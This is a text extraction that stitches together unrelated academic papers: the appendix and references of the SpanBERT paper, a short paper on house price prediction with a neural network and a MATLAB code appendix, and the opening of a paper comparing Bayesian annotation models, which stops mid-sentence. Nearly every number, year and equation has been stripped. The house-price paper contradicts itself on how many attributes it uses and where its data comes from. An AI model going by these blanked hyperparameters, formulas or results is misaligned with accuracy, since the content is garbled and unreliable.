if the lengths are longer than . we choose learning rates from { e- , e- , e- , e- , e- } and batch sizes from { , } and fine-tune four epochs for all the datasets. coreference resolution we divide the docu- ments into multiple chunks of lengths up to max seq length and encode each chunk indepen- dently. we choose max seq length from { , , , }, bert learning rates from { e- , e- }, task-specific learning rates from { e- , e- , e- }, and fine-tune epochs for all the datasets. we use batch size = (one document) for all the experiments. tacred/glue we use max seq length = and choose learning rates from { e- , e- , e- , e- , e- } and batch sizes from { , } and fine-tuning epochs for all the datasets. the only exception is cola, where we used four epochs (following devlin et al., ), because epochs lead to severe overfitting. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april acknowledgments we would like to thank pranav rajpurkar and robin jia for patiently helping us evaluate spanbert on squad. we thank the anonymous reviewers, the action editor, and our colleagues at facebook ai research and the university of washington for their insightful feedback that helped improve the paper. references jimmy lei ba, jamie ryan kiros, and geoffrey e. hinton. . layer normalization. arxiv pre- print arxiv: . . roy bar-haim, ido dagan, bill dolan, lisa ferro, danilo giampiccolo, bernardo magnini, and idan szpektor. . the second pascal recognising textual entailment challenge. in proceedings of the second pascal challenges workshop on recognising textual entailment, pages – . daniel cer, mona diab, eneko agirre, iãśigo lopez-gazpio, and lucia specia. . semeval- task : semantic textual similar- ity multilingual and crosslingual focused eval- uation. in international workshop on semantic evaluation (semeval), pages – . vancouver, canada. william chan, nikita kitaev, kelvin guu, mitchell stern, and jakob uszkoreit. . kermit: generative insertion-based modeling for sequences. arxiv preprint arxiv: . . ido dagan, oren glickman, and bernardo magnini. . the pascal recognising tex- tual entailment challenge. in machine learning challenges workshop, pages – . springer. andrew m. dai and quoc v. le. . semi- supervised sequence learning. in advances in neural information processing systems (nips), pages – . zihang dai, zhilin yang, yiming yang, william w. cohen, jaime carbonell, quoc v. le, and ruslan salakhutdinov. . transformer-xl: attentive language models beyond a fixed- length context. in association for computa- tional linguistics (acl). jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in north american association for computational linguistics (naacl). william b. dolan and chris brockett. . automatically constructing a corpus of sen- tential paraphrases. in proceedings of the inter- national workshop on paraphrasing. li dong, nan yang, wenhui wang, furu wei, xiaodong liu, yu wang, jianfeng gao, ming zhou, and hsiao-wuen hon. . unified language model pre-training for natural lan- guage understanding and generation. in ad- vances in neural information processing systems (nips). matthew dunn, levent sagun, mike higgins, v. ugur guney, volkan cirik, and kyunghyun cho. . searchqa: a new q&a dataset augmented with context from a search engine. arxiv preprint arxiv: . . adam fisch, alon talmor, robin jia, minjoon seo, eunsol choi, and danqi chen. . mrqa shared task: evaluating general- ization in reading comprehension. in proceed- ings of nd machine reading for reading comprehension (mrqa) workshop at emnlp. danilo giampiccolo, bernardo magnini, ido dagan, and bill dolan. . the third pascal recognizing textual entailment challenge. in pro- ceedings of the acl-pascal workshop on tex- tual entailment and paraphrasing, pages – . luheng he, kenton lee, omer levy, and luke zettlemoyer. . jointly predicting predicates and arguments in neural semantic role labeling. in association for computational linguistics (acl), pages – . dan hendrycks and kevin gimpel. . gaussian error linear units (gelus). arxiv pre- print arxiv: . . matthew honnibal and ines montani. . spacy : natural language understanding with bloom embeddings, convolutional neural networks and incremental parsing. to appear. jeremy howard and sebastian ruder. . uni- versal language model fine-tuning for text clas- sification. arxiv preprint arxiv: . . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april mandar joshi, eunsol choi, omer levy, daniel weld, and luke zettlemoyer. a. pair vec: compositional word-pair embeddings for cross-sentence inference. in north american association for computational linguistics (naacl), pages – . mandar joshi, eunsol choi, daniel weld, and luke zettlemoyer. . triviaqa: a large scale distantly supervised challenge dataset for reading comprehension. in association for com- putational linguistics (acl), pages – . mandar joshi, omer levy, daniel s. weld, luke zettlemoyer, and omer levy. b. bert for coreference resolution: baselines and analysis. in empirical methods in natural language processing (emnlp). diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in inter- national conference on learning representa- tions (iclr). ryan kiros, yukun zhu, ruslan r. salakhutdinov, richard s. zemel, antonio torralba, raquel urtasun, and sanja fidler. . skip-thought vectors. in advances in neural information processing systems (nips). tom kwiatkowski, jennimaria palomaki, olivia redfield, michael collins, ankur parikh, chris alberti, danielle epstein, illia polosukhin, matthew kelcey, jacob devlin, kenton lee, kristina n. toutanova, llion jones, ming- wei chang, andrew dai, jakob uszkoreit, quoc le, and slav petrov. . natural questions: a benchmark for question answering research. transactions of the association of computational linguistics (tacl). guillaume lample and alexis conneau. . cross-lingual language model pretraining. advances in neural information processing systems (nips). kenton lee, luheng he, mike lewis, and luke zettlemoyer. . end-to-end neural coreference resolution. in empirical methods in natural language processing (emnlp), pages – . kenton lee, luheng he, and luke zettlemoyer. . higher-order coreference resolution with coarse-to-fine inference. in north american association for computational linguistics (naacl), pages – . kenton lee, shimi salant, tom kwiatkowski, ankur parikh, dipanjan das, and jonathan berant. . learning recurrent span repre- sentations for extractive question answering. arxiv preprint arxiv: . . hector j. levesque, ernest davis, and leora morgenstern. . the winograd schema challenge. in aaai spring symposium: logical formalizations of commonsense reasoning, volume , page . xiaodong liu, pengcheng he, weizhu chen, and jianfeng gao. a. multi-task deep neural networks for natural language understanding. in proceedings of the th annual meeting of the association for computational linguistics. as- sociation for computational linguistics (acl). yinhan liu, myle ott, naman goyal, jingfei du, mandar joshi, danqi chen, omer levy, mike lewis, luke zettlemoyer, and veselin stoyanov. b. roberta: a robustly opti- mized bert pretraining approach. arxiv pre- print arxiv: . . lajanugen logeswaran and honglak lee. . an efficient framework for learning sentence representations. arxiv preprint arxiv: . . ilya loshchilov and frank hutter. . decou- pled weight decay regularization. in interna- tional conference on learning representations (iclr). oren melamud, jacob goldberger, and ido dagan. . context vec: learning generic context embedding with bidirectional lstm. in com- putational natural language learning (conll), pages – . myle ott, sergey edunov, alexei baevski, angela fan, sam gross, nathan ng, david grangier, and michael auli. . fairseq: a fast, exten- sible toolkit for sequence modeling. in north american association for computational lin- guistics (naacl), pages – . matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april and luke zettlemoyer. . deep contextual- ized word representations. in north american association for computational linguistics (naacl), pages – . sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multi- lingual unrestricted coreference in ontonotes. in joint conference on emnlp and conll- shared task, pages – . ofir press and lior wolf. . using the out- put embedding to improve language models. in proceedings of the th conference of the european chapter of the association for com- putational linguistics: volume , short papers, pages – . association for computational linguistics (acl). alec radford, karthik narasimhan, time salimans, and ilya sutskever. . improving language un- derstanding with unsupervised learning, openai. pranav rajpurkar, robin jia, and percy liang. . know what you don’t know: unanswer- able questions for squad. in association for computational linguistics (acl), pages – . pranav rajpurkar, jian zhang, konstantin lopyrev, and percy liang. . squad: , + questions for machine comprehension of text. in empirical methods in natural language processing (emnlp), pages – . livio baldini soares, nicholas arthur fitzgerald, jeffrey ling, and tom kwiatkowski. . matching the blanks: distributional similarity for relation learning. in association for compu- tational linguistics (acl), pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in empirical methods in natural language processing (emnlp), pages – . kaitao song, xu tan, tao qin, jianfeng lu, and tie-yan liu. . mass: masked se- quence to sequence pre-training for language generation. in international conference on machine learning (icml), pages – . mitchell stern, noam shazeer, and jakob uszkoreit. . blockwise parallel decod- ing for deep autoregressive models. in advances in neural information processing systems (nips). yu stephanie sun, shuohuan wang, yukun li, shikun feng, xuyi chen, han zhang, xinlun tian, danxiang zhu, hao tian, and hua wu. . ernie: enhanced representation through knowledge integration. arxiv preprint arxiv: . . adam trischler, tong wang, xingdi yuan, justin harris, alessandro sordoni, philip bachman, and kaheer suleman. . newsqa: a ma- chine comprehension dataset. in nd work- shop on representation learning for nlp, pages – . ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, Łukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems (nips). alex wang, amapreet singh, julian michael, felix hill, omer levy, and samuel r. bowman. . glue: a multi-task benchmark and anal- ysis platform for natural language understand- ing. in international conference on learning representations (iclr). alex warstadt, amanpreet singh, and samuel r. bowman. . neural network acceptability judgments. arxiv preprint arxiv: . . adina williams, nikita nangia, and samuel bowman. . a broad-coverage challenge corpus for sentence understanding through in- ference. in north american association for com- putational linguistics (naacl), pages – . thomas wolf, lysandre debut, victor sanh, julien chaumond, clement delangue, anthony moi, pierric cistac, tim rault, r’emi louf, morgan funtowicz, and jamie brew. . huggingface’s transformers: state-of-the-art natural language processing. arxiv preprint arxiv: . . zhilin yang, zihang dai, yiming yang, jaime carbonell, ruslan salakhutdinov, and quoc v. le. . xlnet: generalized autoregressive downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april pretraining for language understanding. in advances in neural information processing systems (neurips). zhilin yang, peng qi, saizheng zhang, yoshua bengio, william cohen, ruslan salakhutdinov, and christopher d. manning. . hotpotqa: a dataset for diverse, explainable multi-hop question answering. in empirical methods in natural language processing (emnlp), pages – . yuhao zhang, victor zhong, danqi chen, gabor angeli, and christopher d. manning. . position-aware attention and supervised data improve slot filling. in empirical methods in natural language processing (emnlp), pages – . zhengyan zhang, xu han, zhiyuan liu, xin jiang, maosong sun, and qun liu. . ernie: enhanced language representation with informative entities. in association for compu- tational linguistics (acl), pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction background: bert model span masking span boundary objective single-sequence training experimental setup tasks implementation baselines results per-task results overall trends ablation studies masking schemes auxiliary objectives related work conclusion appendices pre-training procedure fine-tuning hyperparameters paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on house price prediction based on multi- dimensional data fusion yang yonghui school of computer science and engineering xi’an technological university xi’an, , china e-mail: yangyh @qq.com abstract—the price of commercial housing is related to the process of urbanization in china and the living standard of residents, so the prediction of the price of commercial housing is very important. a major difficulty in predicting regression problems is how to handle different attribute types and fuse them. this paper proposes a house price prediction model based on multi-dimensional data fusion and a fully connected neural network. the model building steps are: first, normalize the data involved in the sample; then, interpolate the normalized data to increase the data density; subsequently, the normalized sample data is converted into a pixel matrix; finally, a fully connected neural network model is established from the pixel matrix to the price of the commercial house. after the neural network model has been established, the price of house can be obtained by entering the attributes of the house into the neural network model. keywords-multi-dimensional data fusion; fully connected neural network model; house price prediction i. introduction urbanization[ ], also known as urbanization and urbanization, refers to the process of population gathering towards cities, the expansion of cities, and the series of economic and social changes that result from it. the essence is the changes in economic, social, and spatial structures. modernization is the core proposition of china's modernization process and sustained economic growth. in recent years, with the further progress of china's urbanization process, more and more young people have begun to enter second-tier, third tier and even first-tier cities. a major factor affecting young people's entry into big cities is the price of local commercial housing. in other words, a major factor affecting china's urbanization process is the price of urban house. this shows that it is necessary to forecast house prices. the attributes that affect house prices are transaction date, house age, distance from the subway station, the number of convenience stores in the walking circle, the dimension of the house, and the longitude of the house. this paper will build a data fusion model. the input information of this model is the seven factors that affect house prices, and the output information is the price of commercial housing. after the data fusion model has been established, only the attributes that affect house prices are entered into the data fusion model, and the price of the commercial house can be obtained. a. research background and significance with the development of china's economy, people's living standards have gradually improved, and economic development has made people have a higher pursuit of living places. according to data from the national bureau of statistics[ ]: from january to december , the investment in real estate development nationwide was , . billion yuan, an increase of . % over the previous year, and the growth rate was . percentage points lower than the january- november period, an increase from the same period of the previous year. . percentage points. among them, residential investment was , . billion yuan, an increase of . %, a . percentage point drop from january to november, and an increase of percentage points from the previous year. the proportion of residential investment in real estate development investment was . %. with the increase in housing sales, housing prices have also increased. according to relevant data, china's housing prices have at least doubled from . with the increase of house prices, people pay more attention to the prediction of house prices. this paper will build a data fusion model. the input information of this model is six attributes that affect house prices: transaction date, house age, distance from the subway station, the number of convenience stores in the walking circle, the dimension of the house, and the longitude of the house; the output is the price of the commercial house. after the data mailto:yangyh @qq.com international journal of advanced network, monitoring and controls volume , no. , fusion model has been established, only the six attributes that affect house prices are entered into the data fusion model, and the price of the commercial house can be obtained. the research of house price prediction based on multi-dimensional data fusion can provide reference for china's house price prediction and further promote the development of urbanization in china. b. data sources the data in this paper comes from the boston house price data provided by kaggle, and the amount of data selected is relatively small. the data set contains training samples and test samples, for a total of sample data. there are attributes that affect house prices in house price forecasts. in the problem of house price prediction, the attributes that affect house prices are: transaction date , house age , distance from the subway station , the number of convenience stores in the walking circle , the dimension of the house , and the longitude of the house ; dependent variable is house price . ii. key technology a. research methods for regression problems house price forecasting is a forecasting problem, and forecasting problems are regression analysis. this section aims to state the research methods of regression analysis. regression analysis[ ] is a method of statistically analyzing data. the purpose is to understand whether two or more variables are related, the direction, and strength of the correlation and establish a mathematical model to observe specific variables to predict the variables of interest to researchers. the roles in regression analysis are independent and dependent variables: the independent variable is a variable that actively changes, for example, several factors that affect house prices in this paper are independent variables; the dependent variable is a passively generated due to changes in independent variables, such as housing prices in this paper, are a dependent variable. regression analysis can also be understood as a method for analyzing the relationship between independent and dependent variables. the regression analysis methods are linear regression, logistic regression, and polynomial stepwise regression. linear regression is a linear equation established between the independent variable and the dependent variable. this is the most well-known regression model. in this type of model, the independent variable may be discrete or continuous; the dependent variable must be continuous, and the nature of linear regression is linear. logistic regression is a logistic equation built from independent variables to dependent variables. this is a regression model used to calculate the success or failure of an event. in this type of model, the independent variable may be discrete or continuous; the dependent variable must be in the interval [ ] . polynomial regression is a polynomial equation established between the independent variable and the dependent variable. this is a polynomial regression model commonly used in the field of deep learning. under this model, a low polynomial degree leads to underfitting, and a high polynomial degree leads to overfitting. when dealing with multiple independent variables, stepwise regression is needed[ ]. standard stepwise regression does two things, adding or removing independent variables at each step. in this technique, the selection of independent variables is done by means of an automated process, which does not involve manual intervention. b. research methods for data fusion data fusion[ ] is a technology that fuses attribute values from different attributes. fusion of multiple attributes will get better performance results than a single attribute. data fusion is widely used in multidisciplinary and multi-scenario integration fields. for example, you can monitor the patient's physiological and psychological information through different hardware devices, and finally obtain the patient's physical condition through data fusion. there are many similar examples. there are also many difficulties in data fusion. the first is how to deal with different attributes, and the second is how to fuse the data. there are many difficulties in data fusion design. the first is how to handle different attribute types, and the second is how to fuse attributes. this thesis will detail the processing method of the attribute type in the "handling of attribute types" section and the data fusion method in the "data fusion" section. c. handling of attribute types the attribute type refers to the data type of the attribute. the attribute types are: large_attributes, small_attributes, intermediate_attributes, and interval_attributes[ ]. ) large_attributes the large_attributes are the larger the independent variable, the larger the dependent variable, that is, the independent variable will have a positive benefit on the dependent variable, in other words, there is a positive correlation between the dependent variable and the independent variable. the processing method for very large attributes is shown in ( ). international journal of advanced network, monitoring and controls volume , no. ,  ( ) among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value. ) small_attributes the small_attributes refers to: the larger the independent variable, the smaller the value of the dependent variable, that is, the independent variable will have a negative benefit on the dependent variable, in other words there is a negative correlation between the independent variable and the dependent variable. the processing method of extremely small attributes is shown in ( ).  ( ) among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value. after processing by the above method, the extremely small attributes have been transformed into extremely large attributes. ) intermediate_attributes intermediate_attributes refer to the existence of a threshold. when the independent variable is smaller than the threshold, it displays the characteristics of large_attributes. when the independent variable is larger than the threshold, it displays the characteristics of small_attributes. specifically, when the independent variable is less than the threshold, there is a positive correlation between the independent variable and the dependent variable; when the independent variable is greater than the threshold, there is a negative correlation between the independent variable and the dependent variable. the processing method of intermediate_attributes is shown in ( ). {  ( ) among them, is the maximum value of the attribute value; is the minimum value of the attribute value; is the original value of the attribute value; is the normalized attribute value; is the threshold. after processing by the above method, the interval attribute has been transformed into large_attributes. ) enumerated_attributes enumerated_attributes means that the attribute value of the independent variable does not have real measurement characteristics, and the result of the dependent variable will be affected by the value of the independent variable, but this influence relationship is difficult to express. the processing method of enumerated_attributes is as follows: step : list all the values of the input attributes; suppose the input attribute contains attribute values: 、 、…、 ; step : convert the attribute value to one-hot [ ] form; among them, is the attribute value, so a vector with only the position being can be used instead. that is, can be expressed as: ( ) ; among them, is the attribute value, so a vector with only the position being can be used instead. that is, can be expressed as: ( ) ;…… among them, is the attribute value, so a vector with only the position being can be used instead. that is, can be expressed as: ( ) ; so far, all values of the attribute have been expressed as one-hot form. d. data fusion this section analyzes the problem of data fusion, that is, how to merge large_attributes, small_attributes, interval_attributes, and enumerated_attributes together. this thesis will propose a pixel-based data fusion method: first establish a pixel matrix; then use a fully connected neural network model to process the pixel matrix. ) create a pixel matrix this section aims to transform multiple attributes into a pixel arrangement. specifically, it is assumed that the sample contains samples and each sample contain attributes, that is, all values for the sample are: , , …, , …, , …, ; all values for the sample are: , , …, …, , …, ; international journal of advanced network, monitoring and controls volume , no. , …… all values for the sample are: , …, …, …, . then, the pixel matrix is:( ) ; and the pixel matrix is:( ) ; …… and the pixel matrix is:( ) . ) processing pixel matrix in "create a pixel matrix", this article has already established the number of pixel matrices as the number of samples, and then we need to use the neural network to process the pixel matrix. the choice of network structure: there are many neural network model structures, such as fully connected layer neural networks, convolutional neural networks, long-short-term memory networks, and residual network. because the application scenario in this paper is simple, it is more appropriate to choose a fully connected neural network model. selection of activation function: the activation function is a function that runs on the neuron and is responsible for mapping the input of the neuron to the output. the activation functions are: function (figure ), function (figure ), function (figure ), function (figure ), where is a special form of . regarding the selection principle of the activation function, andrew ng gives the following reference scheme in “neural networks and deep learning”: is very common in machine learning. the activation function is generally defaulted to . is generally better than , but the scope of use of wider; the activation function used in the output layer of the binary classification problem is , and was rarely used in other cases; is almost always better than . and have a disadvantage that when the independent variable is large, the slope is small. the gradient descent method is limited; except for the output layer, linear activation functions are rarely used; neural network models use activation functions, which will lead to the final result being a linear combination of input feature vectors. figure . sigmoid figure . tanh figure . relu figure . leaky relu iii. normalization of attributes this part needs to normalize the attributes involved in the data set: first analyze the data type of the attributes by "attribute analysis"; then normalize the attributes by "normalization". international journal of advanced network, monitoring and controls volume , no. , a. attribute analysis as mentioned in "data sources", the data in this paper is derived from boston house price data provided by kaggle, and the amount of data selected this time is relatively small. the data set contains training samples and test samples, for a total of sample data. in the problem of house price prediction, there are attributes that affect house prices: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;. dependent variable: house price . transaction date is a time variable; the house age is a small_attributes; distance from the subway station is a small_attributes; the number of convenience stores in the walking circle is a large_attributes; the dimension of the house and the longitude of the house are an enumerated_attributes. b. normalization transaction date is a time variable; the house age is a small_attributes; distance from the subway station is a small_attributes; the number of convenience stores in the walking circle is a large_attributes; the dimension of the house and the longitude of the house are an enumerated_attributes. iv. data fusion in this part, the normalized data in "normalization of attributes" needs to be fused: first, the pixel matrix is established by "building a pixel matrix"; then the fully connected neural network model is established by "building a neural network model". a. building a pixel matrix a pixel matrix can be established by "data fusion". as described in "data sources", the data in this paper is derived from boston house price data provided by kaggle. the amount of data selected is small. the data set contains training samples and test samples, for a total of sample data. then there are: all values for the sample: ,…, ; all values for the sample: , , …, ; …… all values for the sample: , …, . b. building a neural network model the paper will eventually build a neural network model of house attributes to house prices: where the input attributes are house attributes: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;output information is house price . step : design the network structure through the analysis of "data fusion", this paper will build a fully connected neural network model. the network model structure is shown in (figure network structure): the input layer of the network structure contains input nodes; the network structure contains hidden layers, each of which contains nodes; the output layer of the network structure contains output node; all activation functions use function; training period: ; target accuracy is: ; learning rate: . figure . network structure step : selection of training tools there are many ways to train neural networks, such as tensorflow, caffe, mxnet, torch, theano in python, and nntool in matlab. nntool is a network model training tool that is easy to deploy and simple in the environment. in this paper, the neural network model shown in (figure network structure) is trained by nntool (figure nntool). figure . nntool international journal of advanced network, monitoring and controls volume , no. , step : code design see appendix step : training process in the process of neural network training using matlab, part of the training process is shown in (figure training process). among them, performance is shown in (figure performance); training state is shown in (figure training state); regression is shown in (figure regression). figure . training process figure . performance figure . training state figure . regression step : results the results of the neural network model include two parts: one is the partial result display, as shown in (figure result); the other is the error proportion chart, as shown in (figure error_raph). as can be seen from the (figure regression), the accuracy of the network model is . %. international journal of advanced network, monitoring and controls volume , no. , figure . result figure . error_raph v. summary this paper finally established a neural network model from house attributes to house prices: where the input attributes are commodity house attributes: transaction date ; house age ; distance from the subway station ; the number of convenience stores in the walking circle ; the dimension of the house ; the longitude of the house ;output information is house price .after the neural network model has been established, enter the six attributes of the commercial house into this neural network model, and you can get the corresponding house price. the accuracy of the network model is . %. vi. appendix [pn,minp,maxp,tn,mint,maxt]=premnmx(p,t); nodenum = ; nodenum = ; nodenum = ; nodenum = ; nodenum = ; typenum = ; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; tf = 'tansig'; net=newff(minmax(pn),[nodenum ,nodenum ,n odenum ,nodenum ,nodenum ,typenum],{tf tf tf tf tf tf },'traingdx'); %traingdm net.trainparam.show= ; net.trainparam.epochs= ; net.trainparam.goal= e- ; net.trainparam.lr= . ; net=train(net,pn,tn); p n=tramnmx(ptest,minp,maxp); an=sim(net,p n); [a]=postmnmx(an,mint,maxt) plot( :length(t),t,'o', :length(t)+ ,a,'+'); title('o:predictive_value--- *:actual_value') grid on m=length(a); t =[t,a(m)]; error=t -a; figure plot( :length(error),error,'-.') title('error_graph') grid on international journal of advanced network, monitoring and controls volume , no. , references [ ] lee w c, cheong t s, wu y. the impacts of financial development, urbanization, and globalization on income inequality: a regression- based decomposition approach [j]. ssrn electronic journal, . [ ] tan paul. house prices have been stagnant [j]. journalist observation, ( ). [ ] gogtay n j, deshpande s p, thatte u m. principles of regression analysis [j]. the journal of the association of physicians of india, , ( ): - . [ ] gooch j w. stepwise regression [j]. encyclopedic dictionary of polymers, . [ ] bleiholder j, naumann f. data fusion [j]. acm computing surveys, , ( ): - . [ ] han zhonggeng. mathematical model for comprehensive evaluation and prediction of yangtze river water quality [j]. journal of engineering mathematics ( ): - . [ ] shuntaro okada, masayuki ohzeki, shinichiro taguchi. efficient partition of integer optimization problems with one-hot encoding[j]. scientific reports, , ( ). [ ] wang zhaoqing, lu xiaoyang. a macro element method for solving potential problems based on mean value interpolation [j]. journal on numerical methods and computer applications ( ): - . [ ] hershey s, chaudhuri s, ellis d p w, et al. cnn architectures for large-scale audio classification[c]// . comparing bayesian models of annotation silviu paun bob carpenter jon chamberlain dirk hovy udo kruschwitz massimo poesio school of electronic engineering and computer science, queen mary university of london department of statistics, columbia university school of computer science and electronic engineering, university of essex department of marketing, bocconi university abstract the analysis of crowdsourced annotations in natural language processing is con- cerned with identifying ( ) gold standard labels, ( ) annotator accuracies and biases, and ( ) item difficulties and error patterns. traditionally, majority voting was used for , and coefficients of agreement for and . lately, model-based analysis of corpus annotations have proven better at all three tasks. but there has been relatively little work comparing them on the same datasets. this paper aims to fill this gap by ana- lyzing six models of annotation, covering different approaches to annotator ability, item difficulty, and parameter pooling (tying) across annotators and items. we evaluate these models along four aspects: comparison to gold labels, predictive accu- racy for new annotations, annotator char- acterization, and item difficulty, using four datasets with varying degrees of noise in the form of random (spammy) annotators. we conclude with guidelines for model selec- tion, application, and implementation. introduction the standard methodology for analyzing crowd- sourced data in nlp is based on majority vot- ing (selecting the label chosen by the majority of coders) and inter-annotator coefficients of agree- ment, such as cohen’s κ (artstein and poesio, ). however, aggregation by majority vote implicitly assumes equal expertise among the annotators. this assumption, though, has been re- peatedly shown to be false in annotation prac- tice (poesio and artstein, ; passonneau and carpenter, ; plank et al., b). chance- adjusted coefficients of agreement also have many shortcomings—for example, agreements in mis- take, overly large chance-agreement in datasets with skewed classes, or no annotator bias correc- tion (feinstein and cicchetti, ; passonneau and carpenter, ). research suggests that models of annotation can solve these problems of standard practices when applied to crowdsourcing (dawid and skene, ; smyth et al., ; raykar et al., ; hovy et al., ; passonneau and carpenter, ). such probabilistic approaches allow us to characterize the accuracy of the annotators and correct for their bias, as well as account- ing for item-level effects. they have been shown to perform better than non-probabilistic alterna- tives based on heuristic analysis or adjudication (quoc viet hung et al., ). but even though a large number of such models has been proposed (carpenter, ; whitehill et al., ; raykar et al., ; hovy et al., ; simpson et al., ; passonneau and carpenter, ; felt et al., a; kamar et al., ; moreno et al., , in- ter alia), it is not immediately obvious to potential users how these models differ or, in fact, how they should be applied at all. to our knowledge, the literature comparing models of annotation is lim- ited, focused exclusively on synthetic data (quoc viet hung et al., ) or using publicly available implementations that constrain the experiments al- most exclusively to binary annotations (sheshadri and lease, ). contributions • our selection of six widely used models (dawid and skene, ; carpenter, ; hovy et al., ) covers models with vary- ing degrees of complexity: pooled models, which assume all annotators share the same ability; unpooled models, which model in- dividual annotator parameters; and partially pooled models, which use a hierarchical structure to let the level of pooling be dictated by the data. • we carry out the evaluation on four datasets with varying degrees of sparsity and annotator transactions of the association for computational linguistics, vol. , pp. – , . action editor: j boyd-graber. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. ordan figure : plate diagram for multinomial model. the hyperparameters are left out. accuracy in both gold-standard dependent and independent settings. • we use fully bayesian posterior inference to quantify the uncertainty in parameter esti- mates. • we provide guidelines for both model selec- tion and implementation. our findings indicate that models which in- clude annotator structure generally outperform other models, though unpooled models can over- fit. several open-source implementations of each model type are available to users. bayesian annotation models all bayesian models of annotation that we de- scribe are generative: they provide a mechanism to generate parameters θ characterizing the pro- cess (annotator accuracies and biases, prevalence, etc.) from the prior p(θ), then generate the ob- served labels y from the parameters according to the sampling distribution p(y|θ). bayesian infer- ence allows us to condition on some observed data y to draw inferences about the parameters θ; this is done through the posterior, p(θ|y). the uncertainty in such inferences may then be used in applications such as jointly training clas- sifiers (smyth et al., ; raykar et al., ), comparing crowdsourcing systems (lease and kazai, ), or characterizing corpus accuracy (passonneau and carpenter, ). this section describes the six models we eval- uate. these models are drawn from the litera- ture, but some had to be generalized from binary to multiclass annotations. the generalization nat- urally comes with parameterization changes, al- though these do not alter the fundamentals of the models. (one aspect tied to the model parameter- ization is the choice of priors. the guideline we followed was to avoid injecting any class prefer- ences a priori and let the data uncover this infor- mation; see more in § .) figure : plate diagram of the dawid and skene model. . a pooled model multinomial (multinom) the simplest bayesian model of annotation is the binomial model pro- posed in albert and dodd ( ) and discussed in carpenter ( ). this model pools all annota- tors (i.e., assumes they have the same ability; see figure ). the generative process is: • for every class k ∈{ , , ...,k}: – draw class-level abilities ζk ∼ dirichlet( k ) • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(ζci) . unpooled models dawid and skene (d&s) the model proposed by dawid and skene ( ) is, to our knowledge, the first model-based approach to annotation proposed in the literature. it has found wide application (e.g., kim and ghahramani, ; simpson et al., ; passonneau and carpenter, ). it is an unpooled model, namely, each annotator has their own response parameters (see figure ), which are given fixed priors. its generative process is: • for every annotator j ∈{ , , ...,j}: – for every class k ∈{ , , ...,k}: ∗ draw class annotator abilities βj,k ∼ dirichlet( k ) carpenter ( ) parameterizes ability in terms of specificity and sensitivity. for multiclass annotations, we generalize to a full response matrix (passonneau and carpenter, ). notation: k is a k-dimensional vector of values. dawid and skene fit maximum likelihood estimates us- ing expectation maximization (em), but the model is easily extended to include fixed prior information for regularization, or hierarchical priors for fitting the prior jointly with the abil- ity parameters and automatically performing partial pooling. figure : plate diagram for the mace model. • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(βjj[i,n],ci) multi-annotator competence estimation (mace) this model, introduced by hovy et al. ( ), takes into account the credibility of the annotators and their spamming preference and strategy (see figure ). this is another example of an unpooled model, and possibly the model most widely applied to linguistic data (e.g., plank et al., a; sabou et al., ; habernal and gurevych, , inter alia). its generative process is: • for every annotator j ∈{ , , ...,j}: – draw spamming behavior �j ∼ dirichlet( k ) – draw credibility θj ∼ beta( . , . ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ uniform – for every position n ∈{ , , ...,ni}: ∗ draw a spamming indicator si,n ∼ bernoulli( −θjj[i,n]) ∗ if si,n = then: · yi,n = ci ∗ else: · yi,n ∼ categorical(�jj[i,n]) . partially pooled models hierarchical dawid and skene (hierd&s) in this model, the fixed priors of dawid and skene are replaced with hierarchical priors representing notation: jj[i,n] gives the index of the annotator who produced the n-th annotation on item i. that is, propensity to produce labels with malicious intent. figure : plate diagram for the hierarchical dawid and skene model. the overall population of annotators (see figure ). this structure provides partial pooling, using in- formation about the population to improve esti- mates of individuals by regularizing toward the population mean. this is particularly helpful with low count data as found in many crowdsourcing tasks (gelman et al., ). the full generative process is as follows: • for every class k ∈{ , , ...,k}: – draw class ability means ζk,k′ ∼ normal( , ),∀k′ ∈{ , ...,k} – draw class s.d.’s Ωk,k′ ∼ halfnormal( , ),∀k′ • for every annotator j ∈{ , , ...,j}: – for every class k ∈{ , , ...,k}: ∗ draw class annotator abilities βj,k,k′ ∼ normal(ζk,k′, Ωk,k′ ),∀k′ • draw class prevalence π ∼ dirichlet( k ) • for every item i ∈{ , , ...,i}: – draw true class ci ∼ categorical(π) – for every position n ∈{ , , ...,ni}: ∗ draw annotation yi,n ∼ categorical(softmax(βjj[i,n],ci)) item difficulty (itemdiff) we also test an exten- sion of the “beta-binomial by item” model from carpenter ( ), which does not assume any an- notator structure; instead, the annotations of an item are made to depend on its intrinsic difficulty. the model further assumes that item 